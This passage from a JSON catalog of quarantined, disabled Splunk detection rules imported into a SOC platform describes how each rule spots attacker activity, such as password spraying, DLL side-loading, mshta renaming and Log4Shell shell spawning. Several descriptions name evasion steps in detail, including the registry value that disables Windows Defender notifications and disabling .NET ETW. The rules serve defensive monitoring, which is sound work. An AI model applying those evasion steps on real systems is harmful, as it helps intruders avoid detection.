Identifying these attempts allows for timely investigation and mitigation, preventing potential impact on the organization's security posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-iam-failure-group-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8d12f268-c567-4557-9813-f8389e235c06", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_iam_failure_group_deletion.yml" } }, { "id": "splunk-security-content-8d486e2e-3235-4cfe-ac35-0d042e24ecb4", "type": "detection", "name": "O365 Multiple Users Failing To Authenticate From Ip", "description": "The following analytic identifies instances where more than 10 unique user accounts fail to authenticate from a single IP address within a 5-minute window. This detection leverages O365 audit logs, specifically Azure Active Directory login failures (AzureActiveDirectoryStsLogon). Such activity is significant as it may indicate brute-force attacks or password spraying attempts. If confirmed malicious, this behavior suggests an external entity is attempting to breach security by targeting multiple accounts, potentially leading to unauthorized access. 
Immediate action is required to block or monitor the suspicious IP and notify affected users to enhance their security measures.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-multiple-users-failing-to-authenticate-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8d486e2e-3235-4cfe-ac35-0d042e24ecb4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_multiple_users_failing_to_authenticate_from_ip.yml" } }, { "id": "splunk-security-content-8d52cf03-ba25-4101-aa78-07994aed4f74", "type": "detection", "name": "Email files written outside of the Outlook directory", "description": "The following analytic detects email files (.pst or .ost) being created outside the standard Outlook directories. It leverages the Endpoint.Filesystem data model to identify file creation events and filters for email files not located in \"C:\\Users\\*\\My Documents\\Outlook Files\\*\" or \"C:\\Users\\*\\AppData\\Local\\Microsoft\\Outlook*\". This activity is significant as it may indicate data exfiltration or unauthorized access to email data. 
If confirmed malicious, an attacker could potentially access sensitive email content, leading to data breaches or further exploitation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/email-files-written-outside-of-the-outlook-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8d52cf03-ba25-4101-aa78-07994aed4f74", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/email_files_written_outside_of_the_outlook_directory.yml" } }, { "id": "splunk-security-content-8d9e0e06-ba71-4dc5-be16-c1a46d58728c", "type": "detection", "name": "Windows Unsigned MS DLL Side-Loading", "description": "The following analytic identifies potential DLL side-loading instances involving unsigned DLLs mimicking Microsoft signatures. It detects this activity by analyzing Sysmon logs for Event Code 7, where both the `Image` and `ImageLoaded` paths do not match system directories like `system32`, `syswow64`, and `programfiles`. This behavior is significant as adversaries often exploit DLL side-loading to execute malicious code via legitimate processes. 
If confirmed malicious, this activity could allow attackers to execute arbitrary code, potentially leading to privilege escalation, persistence, and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001", "T1547" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unsigned-ms-dll-side-loading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8d9e0e06-ba71-4dc5-be16-c1a46d58728c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unsigned_ms_dll_side_loading.yml" } }, { "id": "splunk-security-content-8db47e12-9c3e-4f5a-b0d6-e42a1895cd4f", "type": "detection", "name": "Windows PowerShell Invoke-RestMethod IP Information Collection", "description": "The following analytic detects the use of PowerShell's Invoke-RestMethod cmdlet to collect geolocation data from ipinfo.io or IP address information from api.ipify.org. This behavior leverages PowerShell Script Block Logging to identify scripts that gather external IP information and potential geolocation data. This activity is significant as it may indicate reconnaissance efforts, where threat actors are attempting to determine the geographical location or network details of a compromised system. 
While some legitimate software may use these services, this pattern is commonly observed in malware and post-exploitation toolkits like those used by Water Gamayun threat actors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1016", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-invoke-restmethod-ip-information-collection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8db47e12-9c3e-4f5a-b0d6-e42a1895cd4f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_invoke_restmethod_ip_information_collection.yml" } }, { "id": "splunk-security-content-8dc9efd5-805a-460e-889e-bc79e5477af9", "type": "detection", "name": "Windows SQL Server Configuration Option Hunt", "description": "This detection helps hunt for changes to SQL Server configuration options that could indicate malicious activity. 
It monitors for modifications to any SQL Server configuration settings, allowing analysts to identify potentially suspicious changes that may be part of an attack, such as enabling dangerous features or modifying security-relevant settings.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sql-server-configuration-option-hunt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8dc9efd5-805a-460e-889e-bc79e5477af9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sql_server_configuration_option_hunt.yml" } }, { "id": "splunk-security-content-8dd73f89-682d-444c-8b41-8e679966ad3c", "type": "detection", "name": "Windows System Script Proxy Execution Syncappvpublishingserver", "description": "The following analytic detects the execution of Syncappvpublishingserver.vbs via wscript.exe or cscript.exe, which may indicate an attempt to download remote files or perform privilege escalation. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. Monitoring this activity is crucial as it can signify malicious use of a native Windows script for unauthorized actions. 
If confirmed malicious, this behavior could lead to unauthorized file downloads or elevated privileges, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-script-proxy-execution-syncappvpublishingserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8dd73f89-682d-444c-8b41-8e679966ad3c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_script_proxy_execution_syncappvpublishingserver.yml" } }, { "id": "splunk-security-content-8e204dfd-cae0-4ea8-a61d-e972a1ff2ff8", "type": "detection", "name": "Malicious Powershell Executed As A Service", "description": "The following analytic identifies the execution of malicious PowerShell commands or payloads via the Windows SC.exe utility. It detects this activity by analyzing Windows System logs (EventCode 7045) and filtering for specific PowerShell-related patterns in the ImagePath field. This behavior is significant because it indicates potential abuse of the Windows Service Control Manager to run unauthorized or harmful scripts, which could lead to system compromise. 
If confirmed malicious, this activity could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/malicious-powershell-executed-as-a-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8e204dfd-cae0-4ea8-a61d-e972a1ff2ff8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/malicious_powershell_executed_as_a_service.yml" } }, { "id": "splunk-security-content-8e207707-ad40-4eb3-b865-3a52aec91f26", "type": "detection", "name": "Windows Modify Registry Disable WinDefender Notifications", "description": "The following analytic detects a suspicious registry modification aimed at disabling Windows Defender notifications. It leverages data from the Endpoint.Registry data model, specifically looking for changes to the registry path \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\Notifications\\\\DisableNotifications\" with a value of \"0x00000001\". This activity is significant as it indicates an attempt to evade detection by disabling security alerts, a technique used by adversaries and malware like RedLine Stealer. 
If confirmed malicious, this could allow attackers to operate undetected, increasing the risk of further compromise and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disable-windefender-notifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8e207707-ad40-4eb3-b865-3a52aec91f26", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disable_windefender_notifications.yml" } }, { "id": "splunk-security-content-8e454f64-4bd6-45e6-8a94-1b482593d721", "type": "detection", "name": "GitHub Organizations Delete Branch Ruleset", "description": "The following analytic detects when branch rulesets are deleted in GitHub Organizations. The detection monitors GitHub Organizations audit logs for branch ruleset deletion events by tracking actor details, repository information, and associated metadata. For a SOC, identifying deleted branch rulesets is critical as it could indicate attempts to bypass code review requirements and security controls. Branch rulesets are essential security controls that enforce code review, prevent force pushes, and maintain code quality. Disabling these protections could allow malicious actors to directly push unauthorized code changes or backdoors to protected branches. 
The impact of disabled branch protection includes potential code tampering, bypass of security reviews, introduction of vulnerabilities or malicious code, and compromise of software supply chain integrity. This activity could be part of a larger attack chain where an adversary first disables security controls before attempting to inject malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-organizations-delete-branch-ruleset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8e454f64-4bd6-45e6-8a94-1b482593d721", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_organizations_delete_branch_ruleset.yml" } }, { "id": "splunk-security-content-8e53f839-e127-4d6d-a54d-a2f67044a57f", "type": "detection", "name": "Windows SOAPHound Binary Execution", "description": "The following analytic detects the execution of the SOAPHound binary (`soaphound.exe`) with specific command-line arguments. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, command-line arguments, and other process-related metadata. This activity is significant because SOAPHound is a known tool used for credential dumping and other malicious activities. 
If confirmed malicious, this behavior could allow an attacker to extract sensitive information, escalate privileges, or persist within the environment, posing a severe threat to organizational security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001", "T1069.002", "T1087.001", "T1087.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-soaphound-binary-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8e53f839-e127-4d6d-a54d-a2f67044a57f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_soaphound_binary_execution.yml" } }, { "id": "splunk-security-content-8e6ca490-7af3-4299-9a24-39fb69759925", "type": "detection", "name": "Ivanti Connect Secure SSRF in SAML Component", "description": "The following analytic identifies POST requests targeting endpoints vulnerable to the SSRF issue (CVE-2024-21893) in Ivanti's products. It leverages the Web data model, focusing on endpoints such as /dana-ws/saml20.ws, /dana-ws/saml.ws, /dana-ws/samlecp.ws, and /dana-na/auth/saml-logout.cgi. The detection filters for POST requests that received an HTTP 200 OK response, indicating successful execution. This activity is significant as it may indicate an attempt to exploit SSRF vulnerabilities, potentially allowing attackers to access internal services or sensitive data. 
If confirmed malicious, this could lead to unauthorized access and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ivanti-connect-secure-ssrf-in-saml-component.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8e6ca490-7af3-4299-9a24-39fb69759925", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/ivanti_connect_secure_ssrf_in_saml_component.yml" } }, { "id": "splunk-security-content-8e897153-2ebd-4cb2-85d3-09ad57db2fb7", "type": "detection", "name": "Windows AD Dangerous Deny ACL Modification", "description": "This detection identifies an Active Directory access-control list (ACL) modification event, which applies permissions that deny the ability to enumerate permissions of the object.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001", "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-dangerous-deny-acl-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8e897153-2ebd-4cb2-85d3-09ad57db2fb7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": 
"https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_dangerous_deny_acl_modification.yml" } }, { "id": "splunk-security-content-8e99f89e-ae58-4ebc-bf52-ae0b1a277e72", "type": "detection", "name": "System Information Discovery Detection", "description": "The following analytic identifies system information discovery techniques, such as the execution of commands like `wmic qfe`, `systeminfo`, and `hostname`. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This activity is significant because attackers often use these commands to gather system configuration details, which can aid in further exploitation. If confirmed malicious, this behavior could allow attackers to tailor their attacks based on the discovered system information, potentially leading to privilege escalation, persistence, or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/system-information-discovery-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8e99f89e-ae58-4ebc-bf52-ae0b1a277e72", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/system_information_discovery_detection.yml" } }, { "id": "splunk-security-content-8eb3e858-18d3-44a4-a514-52cfa39f154a", "type": "detection", "name": "Linux Auditd Service Restarted", "description": "The following analytic detects 
the restarting or re-enabling of services on Linux systems using the `systemctl` or `service` commands. It leverages data from Linux Auditd, focusing on process and command-line execution logs. This activity is significant as adversaries may use it to maintain persistence or execute unauthorized actions. If confirmed malicious, this behavior could lead to repeated execution of malicious payloads, unauthorized access, or data destruction. Security analysts should investigate these events to mitigate risks and prevent further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-service-restarted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8eb3e858-18d3-44a4-a514-52cfa39f154a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_service_restarted.yml" } }, { "id": "splunk-security-content-8ed523ac-276b-11ec-ac39-acde48001122", "type": "detection", "name": "ETW Registry Disabled", "description": "The following analytic detects a registry modification that disables the ETW for the .NET Framework. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the ETWEnabled registry value under the .NETFramework path. This activity is significant because disabling ETW can allow attackers to evade Endpoint Detection and Response (EDR) tools and hide their execution from audit logs. 
If confirmed malicious, this action could enable attackers to operate undetected, potentially leading to further compromise and persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127", "T1562.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/etw-registry-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8ed523ac-276b-11ec-ac39-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/etw_registry_disabled.yml" } }, { "id": "splunk-security-content-8ef3971e-00f2-11ec-b54f-acde48001122", "type": "detection", "name": "Gsuite Email Suspicious Subject With Attachment", "description": "The following analytic identifies Gsuite emails with suspicious subjects and attachments commonly used in spear phishing attacks. It leverages Gsuite email logs, focusing on specific keywords in the subject line and known malicious file types in attachments. This activity is significant for a SOC as spear phishing is a prevalent method for initial compromise, often leading to further malicious actions. 
If confirmed malicious, this activity could result in unauthorized access, data exfiltration, or further malware deployment, posing a significant risk to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gsuite-email-suspicious-subject-with-attachment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8ef3971e-00f2-11ec-b54f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gsuite_email_suspicious_subject_with_attachment.yml" } }, { "id": "splunk-security-content-8f2c4e9a-5d3b-4c7e-9a1f-6e8d5b2c3a9f", "type": "detection", "name": "Cisco ASA - AAA Policy Tampering", "description": "This analytic detects modifications to authentication and authorization (AAA) security policies on Cisco ASA devices via CLI or ASDM.\nAAA policies control critical security mechanisms including authentication attempts, lockout thresholds, password policies, and access control settings that protect administrative access to network infrastructure.\nAdversaries or malicious insiders may weaken authentication policies to facilitate brute force attacks, disable account lockouts to enable unlimited password attempts, reduce password complexity requirements, or modify authorization settings to elevate privileges and maintain persistent access.\nThe detection monitors for command execution events containing AAA-related commands such as `aaa authentication`, `aaa authorization`, or `aaa local 
authentication`, focusing on changes to authentication attempts, lockout policies, and access control configurations.\nInvestigate any unauthorized modifications to AAA policies, especially changes that weaken security posture (increasing max-fail attempts, disabling lockouts, reducing password requirements), and verify these changes against approved change management processes and security policies.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-aaa-policy-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8f2c4e9a-5d3b-4c7e-9a1f-6e8d5b2c3a9f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___aaa_policy_tampering.yml" } }, { "id": "splunk-security-content-8f3a614f-6b98-4f7d-82dd-d0df38452a8b", "type": "detection", "name": "Windows Excessive Service Stop Attempt", "description": "The following analytic detects multiple attempts to stop or delete services on a system using `net.exe` or `sc.exe`. It leverages Endpoint Detection and Response (EDR) telemetry, focusing on process names and command-line executions within a one-minute window. This activity is significant as it may indicate an adversary attempting to disable security or critical services to evade detection and further their objectives. 
If confirmed malicious, this could lead to the attacker gaining persistence, escalating privileges, or disrupting essential services, thereby compromising the system's security posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-excessive-service-stop-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8f3a614f-6b98-4f7d-82dd-d0df38452a8b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_excessive_service_stop_attempt.yml" } }, { "id": "splunk-security-content-8f45fcf0-5b68-11eb-ae93-0242ac130002", "type": "detection", "name": "Detect mshta renamed", "description": "The following analytic identifies instances where mshta.exe has been renamed and executed. It leverages Endpoint Detection and Response (EDR) data, specifically focusing on the original file name field to detect discrepancies. This activity is significant because renaming mshta.exe is a common tactic used by attackers to evade detection and execute malicious scripts. 
If confirmed malicious, this could allow an attacker to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-mshta-renamed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8f45fcf0-5b68-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_mshta_renamed.yml" } }, { "id": "splunk-security-content-8fa2a0f0-acd9-11eb-8994-acde48001122", "type": "detection", "name": "Excessive Attempt To Disable Services", "description": "The following analytic identifies a suspicious series of command-line executions attempting to disable multiple services. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on processes where \"sc.exe\" is used with parameters like \"config\" or \"Disabled\" within a short time frame. This activity is significant as it may indicate an adversary's attempt to disable security or other critical services to further compromise the system. 
If confirmed malicious, this could lead to the attacker achieving persistence, evading detection, or disabling security mechanisms, thereby increasing the risk of further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-attempt-to-disable-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8fa2a0f0-acd9-11eb-8994-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/excessive_attempt_to_disable_services.yml" } }, { "id": "splunk-security-content-8fa891f7-a533-4b3c-af85-5aa2e7c1f1eb", "type": "detection", "name": "Large Volume of DNS ANY Queries", "description": "The following analytic identifies a large volume of DNS ANY queries, which may indicate a DNS amplification attack. It leverages the Network_Resolution data model to count DNS queries of type \"ANY\" directed to specific destinations. This activity is significant because DNS amplification attacks can overwhelm network resources, leading to Denial of Service (DoS) conditions. 
If confirmed malicious, this activity could disrupt services, degrade network performance, and potentially be part of a larger Distributed Denial of Service (DDoS) attack, impacting the availability of critical infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1498.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/large-volume-of-dns-any-queries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8fa891f7-a533-4b3c-af85-5aa2e7c1f1eb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/large_volume_of_dns_any_queries.yml" } }, { "id": "splunk-security-content-8fbd2e88-4ea5-40b9-9217-fd0855e08cc0", "type": "detection", "name": "Windows Remote Services Rdp Enable", "description": "The following analytic detects modifications in the Windows registry to enable Remote Desktop Protocol (RDP) on a targeted machine. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to the \"fDenyTSConnections\" registry value. This activity is significant as enabling RDP via registry is uncommon and often associated with adversaries or malware attempting to gain remote access. 
If confirmed malicious, this could allow attackers to remotely control the compromised host, potentially leading to further exploitation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-services-rdp-enable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8fbd2e88-4ea5-40b9-9217-fd0855e08cc0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_services_rdp_enable.yml" } }, { "id": "splunk-security-content-8fdb41ad-091c-4d7a-af1d-9123fe94b539", "type": "detection", "name": "Web or Application Server Spawning a Shell", "description": "The following analytic detects instances where Java or Tomcat\nprocesses spawn a Linux shell, which may indicate exploitation attempts, such as\nthose related to CVE-2021-44228 (Log4Shell). This detection leverages Endpoint Detection\nand Response (EDR) telemetry, focusing on process names and parent-child process\nrelationships. This activity is significant as it can signify a compromised Java\napplication, potentially leading to unauthorized shell access. 
